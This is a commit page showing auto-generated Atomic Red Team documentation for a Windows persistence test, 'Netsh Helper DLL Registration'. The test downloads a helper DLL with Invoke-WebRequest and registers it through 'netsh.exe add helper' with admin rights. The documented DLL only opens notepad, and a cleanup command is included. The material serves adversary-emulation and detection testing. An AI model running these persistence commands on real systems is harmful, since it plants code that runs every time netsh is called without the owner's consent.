security-tools/atomic-red-team
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

Generated docs from job=generate-docs branch=master [ci skip]

Browse Source
This commit is contained in:
Atomic Red Team doc generator
2022-09-23 18:16:10 +00:00
parent 24530e138f
commit de803e9e53
2 changed files with 64 additions and 11 deletions
Download Patch File Download Diff File Expand all files Collapse all files
atomics/Indexes/index.yaml
+40 -8
View File
@@ -40929,22 +40929,38 @@ privilege-escalation:
atomic_tests:
- name: Netsh Helper DLL Registration
auto_generated_guid: 3244697d-5a3a-4dfc-941c-550f69f91a4d
description: 'Netsh interacts with other operating system components using dynamic-link
library (DLL) files
description: |
You can register a "helper dll" with Netsh as a persistance mechanism. The code in the dll is executed every time netsh.exe is called.
The NetshHelper.dll provided with the atomic will simply launch notepad when netsh.exe is run.
'
[Blog](https://htmlpreview.github.io/?https://github.com/MatthewDemaske/blogbackup/blob/master/netshell.html)
[Sample DLL code](https://github.com/outflanknl/NetshHelperBeacon)
supported_platforms:
- windows
input_arguments:
helper_file:
description: Path to DLL
type: Path
default: C:\Path\file.dll
default: PathToAtomicsFolder\T1546.007\bin\NetshHelper.dll
dependencies:
- description: 'Helper DLL must exist on disk at specified location (#{helper_file})
'
prereq_command: 'if (Test-Path "#{helper_file}") { exit 0} else { exit 1}
'
get_prereq_command: |
New-Item -Type Directory (split-path #{helper_file}) -ErrorAction ignore | Out-Null
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1546.007/bin/NetshHelper.dll" -OutFile "#{helper_file}"
executor:
command: 'netsh.exe add helper #{helper_file}
'
cleanup_command: 'netsh.exe delete helper #{helper_file}
'
name: command_prompt
elevation_required: true
T1574.004:
technique:
x_mitre_platforms:
@@ -63735,22 +63751,38 @@ persistence:
atomic_tests:
- name: Netsh Helper DLL Registration
auto_generated_guid: 3244697d-5a3a-4dfc-941c-550f69f91a4d
description: 'Netsh interacts with other operating system components using dynamic-link
library (DLL) files
description: |
You can register a "helper dll" with Netsh as a persistance mechanism. The code in the dll is executed every time netsh.exe is called.
The NetshHelper.dll provided with the atomic will simply launch notepad when netsh.exe is run.
'
[Blog](https://htmlpreview.github.io/?https://github.com/MatthewDemaske/blogbackup/blob/master/netshell.html)
[Sample DLL code](https://github.com/outflanknl/NetshHelperBeacon)
supported_platforms:
- windows
input_arguments:
helper_file:
description: Path to DLL
type: Path
default: C:\Path\file.dll
default: PathToAtomicsFolder\T1546.007\bin\NetshHelper.dll
dependencies:
- description: 'Helper DLL must exist on disk at specified location (#{helper_file})
'
prereq_command: 'if (Test-Path "#{helper_file}") { exit 0} else { exit 1}
'
get_prereq_command: |
New-Item -Type Directory (split-path #{helper_file}) -ErrorAction ignore | Out-Null
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1546.007/bin/NetshHelper.dll" -OutFile "#{helper_file}"
executor:
command: 'netsh.exe add helper #{helper_file}
'
cleanup_command: 'netsh.exe delete helper #{helper_file}
'
name: command_prompt
elevation_required: true
T1505.001:
technique:
x_mitre_platforms:
atomics/T1546.007/T1546.007.md
+24 -3
View File
@@ -12,7 +12,11 @@ Adversaries can use netsh.exe helper DLLs to trigger execution of arbitrary code
<br/>
## Atomic Test #1 - Netsh Helper DLL Registration
Netsh interacts with other operating system components using dynamic-link library (DLL) files
You can register a "helper dll" with Netsh as a persistance mechanism. The code in the dll is executed every time netsh.exe is called.
The NetshHelper.dll provided with the atomic will simply launch notepad when netsh.exe is run.
[Blog](https://htmlpreview.github.io/?https://github.com/MatthewDemaske/blogbackup/blob/master/netshell.html)
[Sample DLL code](https://github.com/outflanknl/NetshHelperBeacon)
**Supported Platforms:** Windows
@@ -26,19 +30,36 @@ Netsh interacts with other operating system components using dynamic-link librar
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| helper_file | Path to DLL | Path | C:&#92;Path&#92;file.dll|
| helper_file | Path to DLL | Path | PathToAtomicsFolder&#92;T1546.007&#92;bin&#92;NetshHelper.dll|
#### Attack Commands: Run with `command_prompt`!
#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)
```cmd
netsh.exe add helper #{helper_file}
```
#### Cleanup Commands:
```cmd
netsh.exe delete helper #{helper_file}
```
#### Dependencies: Run with `command_prompt`!
##### Description: Helper DLL must exist on disk at specified location (#{helper_file})
##### Check Prereq Commands:
```cmd
if (Test-Path "#{helper_file}") { exit 0} else { exit 1}
```
##### Get Prereq Commands:
```cmd
New-Item -Type Directory (split-path #{helper_file}) -ErrorAction ignore | Out-Null
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1546.007/bin/NetshHelper.dll" -OutFile "#{helper_file}"
```
<br/>